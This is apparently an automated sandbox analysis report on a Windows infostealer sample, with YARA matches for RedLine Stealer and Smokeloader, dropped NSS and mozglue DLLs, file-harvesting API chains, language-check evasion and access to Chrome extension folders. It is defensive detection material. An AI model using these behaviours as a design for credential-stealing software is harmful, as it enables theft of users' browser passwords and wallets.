                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, JEHIJDGI.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: JEHIJDGI.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: JEHIJDGI.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: String function: 004043B0 appears 315 times
                      Source: nss3[1].dll.0.dr | Static PE information: No import functions for PE file found
                      Source: vcruntime140[1].dll.0.dr | Static PE information: No import functions for PE file found
                      Source: nss3.dll.0.dr | Static PE information: No import functions for PE file found
                      Source: vcruntime140.dll.0.dr | Static PE information: No import functions for PE file found
                      Source: nss3[1].dll.0.dr | Static PE information: Data appended to the last section found
                      Source: vcruntime140[1].dll.0.dr | Static PE information: Data appended to the last section found
                      Source: nss3.dll.0.dr | Static PE information: Data appended to the last section found
                      Source: vcruntime140.dll.0.dr | Static PE information: Data appended to the last section found
                      Source: FFAk2gixx5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/18@1/1
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
                      Source: FFAk2gixx5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: FFAk2gixx5.exe, 00000000.00000003.2673898862.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000003.2685397085.00000000231C8000.00000004.00000020.00020000.00000000.sdmp, JECBGCFHCFIDHIDHDGDG.0.dr, CGDGHCBGDHJJKECAECBA.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: FFAk2gixx5.exe, 00000000.00000002.3333975947.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, FFAk2gixx5.exe, 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: FFAk2gixx5.exe | ReversingLabs: Detection: 71%
                      Source: FFAk2gixx5.exe | Virustotal: Detection: 68%
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: msvcr100.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                      Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: nss3[1].dll.0.dr | Static PE information: real checksum: 0x202d6c should be: 0x1c592b
                      Source: vcruntime140[1].dll.0.dr | Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
                      Source: nss3.dll.0.dr | Static PE information: real checksum: 0x202d6c should be: 0x1c592b
                      Source: vcruntime140.dll.0.dr | Static PE information: real checksum: 0x16dd4 should be: 0x14d5a
                      Source: nss3.dll.0.dr | Static PE information: section name: .00cfg
                      Source: nss3[1].dll.0.dr | Static PE information: section name: .00cfg
                      Source: softokn3.dll.0.dr | Static PE information: section name: .00cfg
                      Source: softokn3[1].dll.0.dr | Static PE information: section name: .00cfg
                      Source: freebl3.dll.0.dr | Static PE information: section name: .00cfg
                      Source: freebl3[1].dll.0.dr | Static PE information: section name: .00cfg
                      Source: mozglue.dll.0.dr | Static PE information: section name: .00cfg
                      Source: mozglue[1].dll.0.dr | Static PE information: section name: .00cfg
                      Source: msvcp140.dll.0.dr | Static PE information: section name: .didat
                      Source: msvcp140[1].dll.0.dr | Static PE information: section name: .didat
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\nss3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\mozglue.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\msvcp140.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\freebl3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\vcruntime140.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\ProgramData\softokn3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\mozglue.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00401120 GetSystemInfo,ExitProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
